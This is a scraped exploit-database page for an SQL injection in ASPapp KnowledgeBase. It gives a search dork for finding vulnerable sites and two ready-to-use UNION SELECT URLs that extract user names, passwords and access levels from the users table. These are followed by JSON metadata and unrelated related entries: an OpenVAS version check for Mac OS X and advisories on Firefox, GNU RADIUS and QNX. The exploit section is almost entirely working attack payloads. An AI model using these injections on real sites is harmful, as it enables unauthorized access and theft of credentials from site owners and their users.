Search...

ASPapp KnowledgeBase (catid) Remote SQL Injection Vulnerability

2008-09-27T00:00:00

ID 1337DAY-ID-3774
Type zdt
Reporter Crackers_Child
Modified 2008-09-27T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===============================================================
ASPapp KnowledgeBase (catid) Remote SQL Injection Vulnerability
===============================================================


Dork -  content_by_cat.asp?contentid ''catid'' 

Exploit : 

content_by_cat.asp?contentid=99999999&catid=-99887766 UNION SELECT 0,null,password,3,accesslevel,5,null,7,null,user_name from users

Exploit 2 :

content_by_cat.asp?contentid=-99999999&catid=-99887766 union select 0,null,password,3,accesslevel,5,null,7,8,user_name from users

DownLoad Site : http://camyuva.bel.tr/who.php



#  0day.today [2018-03-14]  #

JSON Vulners Source

Initial Source

{"hash": "de0459b9e087b9c48a755fc92be999712c0b1a1d9a16f271ac407fe0a938f73b", "id": "1337DAY-ID-3774", "lastseen": "2018-03-14T06:42:15", "viewCount": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "3195e62d81b74fbef0492d8a738d41c8", "key": "href"}, {"hash": "4ad87eb8396fbb47d02cc7b33060f3fe", "key": "modified"}, {"hash": "4ad87eb8396fbb47d02cc7b33060f3fe", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "a99cc68e1870149c2e4575658353cecb", "key": "reporter"}, {"hash": "7b66c78c6e5892170cdbf122cd0318fd", "key": "sourceData"}, {"hash": "7159c274e41d92c1bac248eaf184d810", "key": "sourceHref"}, {"hash": "a9647f5d3f571a1f27d3c2e4116c0340", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2018-03-14T06:42:15"}, "vulnersScore": 7.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/3774", "description": "Exploit for unknown platform in category web applications", "title": "ASPapp KnowledgeBase (catid) Remote SQL Injection Vulnerability", "history": [{"bulletin": {"hash": "f79132a91474a5062603fda645d4b2d5199f9dc9bdae54279e27dc8a0ae36cbd", "id": "1337DAY-ID-3774", "lastseen": "2016-04-19T04:17:33", "enchantments": {"score": {"value": 4.1, "modified": "2016-04-19T04:17:33"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "19e0f963d416b3d9bb8670dcee875159", "key": "sourceHref"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "4ad87eb8396fbb47d02cc7b33060f3fe", "key": "modified"}, {"hash": "4ad87eb8396fbb47d02cc7b33060f3fe", "key": "published"}, {"hash": "9e54ad71945576b5c610cb3254c4f127", "key": "href"}, {"hash": "55d7e5c7fe7760d234288cf274e83a6c", "key": "sourceData"}, {"hash": "a9647f5d3f571a1f27d3c2e4116c0340", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "a99cc68e1870149c2e4575658353cecb", "key": "reporter"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/3774", "description": "Exploit for unknown platform in category web applications", "viewCount": 0, "title": "ASPapp KnowledgeBase (catid) Remote SQL Injection Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "===============================================================\r\nASPapp KnowledgeBase (catid) Remote SQL Injection Vulnerability\r\n===============================================================\r\n\r\n\r\nDork - content_by_cat.asp?contentid ''catid'' \r\n\r\nExploit : \r\n\r\ncontent_by_cat.asp?contentid=99999999&catid=-99887766 UNION SELECT 0,null,password,3,accesslevel,5,null,7,null,user_name from users\r\n\r\nExploit 2 :\r\n\r\ncontent_by_cat.asp?contentid=-99999999&catid=-99887766 union select 0,null,password,3,accesslevel,5,null,7,8,user_name from users\r\n\r\nDownLoad Site : http://camyuva.bel.tr/who.php\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "published": "2008-09-27T00:00:00", "references": [], "reporter": "Crackers_Child", "modified": "2008-09-27T00:00:00", "href": "http://0day.today/exploit/description/3774"}, "lastseen": "2016-04-19T04:17:33", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "===============================================================\r\nASPapp KnowledgeBase (catid) Remote SQL Injection Vulnerability\r\n===============================================================\r\n\r\n\r\nDork - content_by_cat.asp?contentid ''catid'' \r\n\r\nExploit : \r\n\r\ncontent_by_cat.asp?contentid=99999999&catid=-99887766 UNION SELECT 0,null,password,3,accesslevel,5,null,7,null,user_name from users\r\n\r\nExploit 2 :\r\n\r\ncontent_by_cat.asp?contentid=-99999999&catid=-99887766 union select 0,null,password,3,accesslevel,5,null,7,8,user_name from users\r\n\r\nDownLoad Site : http://camyuva.bel.tr/who.php\r\n\r\n\r\n\n# 0day.today [2018-03-14] #", "published": "2008-09-27T00:00:00", "references": [], "reporter": "Crackers_Child", "modified": "2008-09-27T00:00:00", "href": "https://0day.today/exploit/description/3774"}

{"openvas": [{"lastseen": "2018-09-01T23:51:10", "bulletinFamily": "scanner", "description": "This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.", "modified": "2018-05-23T00:00:00", "published": "2015-10-29T00:00:00", "id": "OPENVAS:1361412562310806153", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806153", "title": "Apple Mac OS X Multiple Vulnerabilities-03 October-15", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apple_macosx_mult_vuln03_oct15.nasl 9940 2018-05-23 15:46:09Z cfischer $\n#\n# Apple Mac OS X Multiple Vulnerabilities-03 October-15\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806153\");\n script_version(\"$Revision: 9940 $\");\n script_cve_id(\"CVE-2015-5779\", \"CVE-2015-5783\", \"CVE-2015-5772\", \"CVE-2015-5771\",\n \"CVE-2015-5768\", \"CVE-2015-5763\", \"CVE-2015-5754\", \"CVE-2015-5753\",\n \"CVE-2015-5751\", \"CVE-2015-5750\", \"CVE-2015-5748\", \"CVE-2015-5747\",\n \"CVE-2015-3794\", \"CVE-2015-3799\", \"CVE-2015-3792\", \"CVE-2015-3791\",\n \"CVE-2015-3790\", \"CVE-2015-3789\", \"CVE-2015-3788\", \"CVE-2015-3787\",\n \"CVE-2015-3786\", \"CVE-2015-3783\", \"CVE-2015-3781\", \"CVE-2015-3780\",\n \"CVE-2015-3779\", \"CVE-2015-3777\", \"CVE-2015-3775\", \"CVE-2015-3774\",\n \"CVE-2015-3773\", \"CVE-2015-3772\", \"CVE-2015-3771\", \"CVE-2015-3770\",\n \"CVE-2015-3769\", \"CVE-2015-3767\", \"CVE-2015-3765\", \"CVE-2015-3764\",\n \"CVE-2015-3762\", \"CVE-2015-3761\", \"CVE-2015-3760\", \"CVE-2015-3757\",\n \"CVE-2013-7422\", \"CVE-2015-5784\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-05-23 17:46:09 +0200 (Wed, 23 May 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-29 13:43:34 +0530 (Thu, 29 Oct 2015)\");\n script_name(\"Apple Mac OS X Multiple Vulnerabilities-03 October-15\");\n\n script_tag(name: \"summary\" , value:\"This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name: \"vuldetect\" , value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name: \"insight\" , value:\"Multiple flaws exists. For details refer\n reference section.\");\n\n script_tag(name: \"impact\" , value:\"Successful exploitation will allow attacker\n to obtain sensitive information, execute arbitrary code, bypass intended launch\n restrictions and access restrictions, cause a denial of service, write to\n arbitrary files, execute arbitrary code with system privilege.\n\n Impact Level: System/Application\");\n\n script_tag(name: \"affected\" , value:\"Apple Mac OS X versions 10.9 through 10.9.5\n prior to build 13F1134 and 10.10.x before 10.10.5\");\n\n script_tag(name: \"solution\" , value:\"Upgrade Apple Mac OS X 10.10.x to version\n 10.10.5 or later or apply appropriate patch for Apple Mac OS X 10.9.x. For\n updates refer to Reference links.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name : \"URL\" , value : \"https://support.apple.com/en-us/HT205031\");\n script_xref(name : \"URL\" , value : \"http://lists.apple.com/archives/security-announce/2015/Aug/msg00001.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName || \"Mac OS X\" >!< osName){\n exit(0);\n}\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer || osVer !~ \"^(10\\.(10|9))\"){\n exit(0);\n}\n\nif(osVer =~ \"^(10\\.9)\")\n{\n if(version_in_range(version:osVer, test_version:\"10.9\", test_version2:\"10.9.4\")){\n fix = \"Upgrade to latest OS release and apply patch from vendor\";\n }\n\n else if(osVer == \"10.9.5\")\n {\n buildVer = get_kb_item(\"ssh/login/osx_build\");\n if(buildVer)\n {\n if((osVer == \"10.9.5\" && version_is_less(version:buildVer, test_version:\"13F1134\")))\n {\n fix = \"Apply patch from vendor\";\n osVer = osVer + \" Build \" + buildVer;\n }\n }\n }\n}\n\nelse if(version_in_range(version:osVer, test_version:\"10.10\", test_version2:\"10.10.4\")){\n fix = \"10.10.5\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:osVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:38", "bulletinFamily": "software", "description": "Hi folks,\r\n\r\nFirefox 3.6.13 fixes an interesting bug in their same-origin policy\r\nlogic for pseudo-URLs that do not have any inherent origin associated\r\nwith them. These documents are normally expected to inherit the\r\ncontext from their parent, or be assigned a unique one. This didn't\r\nwork as expected in Firefox, apparently due to a code refactoring in\r\n2008. The vulnerability permits malicious websites to access and\r\nmodify the contents of special pages such as about:neterror or\r\nabout:config, which has consequences ranging from content spoofing to\r\ncomplete subversion of the browser security model.\r\n\r\nMore info:\r\nhttp://lcamtuf.blogspot.com/2010/12/firefox-3613-damn-you-corner-cases.html\r\nWhimsical PoC: http://lcamtuf.coredump.cx/ffabout/\r\n\r\nPS. I posted a couple of probably interesting browser security\r\nwrite-ups on my blog of recent, recapping the status quo in areas such\r\nas HTTP cookie security. Some readers might find them interesting /\r\nuseful - say:\r\nhttp://lcamtuf.blogspot.com/2010/10/http-cookies-or-how-not-to-design.html\r\n\r\nCheers,\r\n/mz", "modified": "2010-12-10T00:00:00", "published": "2010-12-10T00:00:00", "id": "SECURITYVULNS:DOC:25274", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25274", "title": "Firefox 3.6.13 pseudo-URL SOP check bug (CVE-2010-3774)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:18", "bulletinFamily": "software", "description": "SNMP packet with invalid oid causes server to crash.", "modified": "2004-06-23T00:00:00", "published": "2004-06-23T00:00:00", "id": "SECURITYVULNS:VULN:3774", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:3774", "title": "GNU RADIUS SNMP DoS", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:06", "bulletinFamily": "software", "description": "TOPIC: Multiple incorrect permissions in QNX.\r\nADVISORY NR: 200202\r\nDATE: Nov 13 2002\r\nVULNERABILITY FOUND BY: 1; (One Semicolon)\r\n\r\n\r\nCONTACT INFORMATION:\r\nhttp://www.4os.org\r\ns@4os.org\r\n\r\n\r\nSTATUS: QNX Software Systems Ltd was contacted on November 11, 2002.\r\nI received prompt replies and was assured that this was being sent through\r\nthe proper channels to have this resolved. I was unable to receive a\r\npreliminary patch or a estimate as to how long this process would take.\r\n\r\n\r\nDESCRIPTION\r\nInstalling the OS Update for 6.2.0 (Patch A) will affect the permissions of\r\nio-audio.\r\n\r\nQNX also released two experimental patches to resolve rather big issues. \r\nThey\r\nhowever set incorrect permissions. These two patches are:\r\n - PhShutdown security patch\r\n - Package file system patch\r\n\r\ncpim (Chinese Method Input) and vpim (Japanese Method Input) version 2.0.3,\r\nbut most likely also earlier editions, set incorrect permissions.\r\n\r\nphrelaycfg, new since QNX 6.1.0, also has incorrect permissions.\r\n\r\nAs part of the games pack, version 2.0.3 in this case, the following games\r\nare installed with improper permissions:\r\n - Columns\r\n - Othello\r\n - Peg\r\n - Solitaire\r\n - Vpoker\r\n\r\nISSUE\r\nAll aforementioned programs have permissions of rwxrwxrwx. This means that\r\nany user can read or write to the binaries allowing anyone to replace them.\r\n\r\nThe following files are affected:\r\nOS Update Patch A:\r\n - /sbin/io-audio\r\n\r\nQNX experimental patches:\r\n - /bin/shutdown\r\n - /sbin/fs-pkg\r\n - /usr/photon/bin/phshutdown\r\n\r\nCPIM/VPIM\r\n - /usr/photon/bin/cpim\r\n - /usr/photon/bin/vpim\r\n\r\nPhrelaycfg\r\n - /usr/photon/bin/phrelaycfg\r\n\r\nGames\r\n - /usr/photon/bin/columns\r\n - /usr/photon/bin/othello\r\n - /usr/photon/bin/peg\r\n - /usr/photon/bin/solitaire\r\n - /usr/photon/bin/vpoker\r\n\r\n\r\nSYSTEM INFORMATION:\r\nQNX 6.2.0 Non-commercial edition on an x86 architecture was used. All \r\npatches\r\nand updates were applied at the time of writing.\r\n\r\n\r\nFIX\r\nAdjust the permissions of these particular binaries. Then proceed\r\nto search the complete file system for any other files that may not have\r\nproper permissions.\r\n\r\nContact QNX to find out what appropriate actions to take to prevent this in\r\nthe future.\r\n\r\n\r\nFINAL NOTES\r\nSome systems have been found that have different permissions for different\r\nfiles.\r\n\r\nBefore letting anyone access a QNX system, it is always a good idea to\r\nexecute "find / -perm -2 ! -type l -ls >> result.txt". Besides the programs\r\nmentioned today, several other programs may or may not have set proper\r\npermissions depending on the amount of packages you installed.\r\n", "modified": "2002-11-20T00:00:00", "published": "2002-11-20T00:00:00", "id": "SECURITYVULNS:DOC:3774", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:3774", "title": "Multiple incorrect permissions in QNX.", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}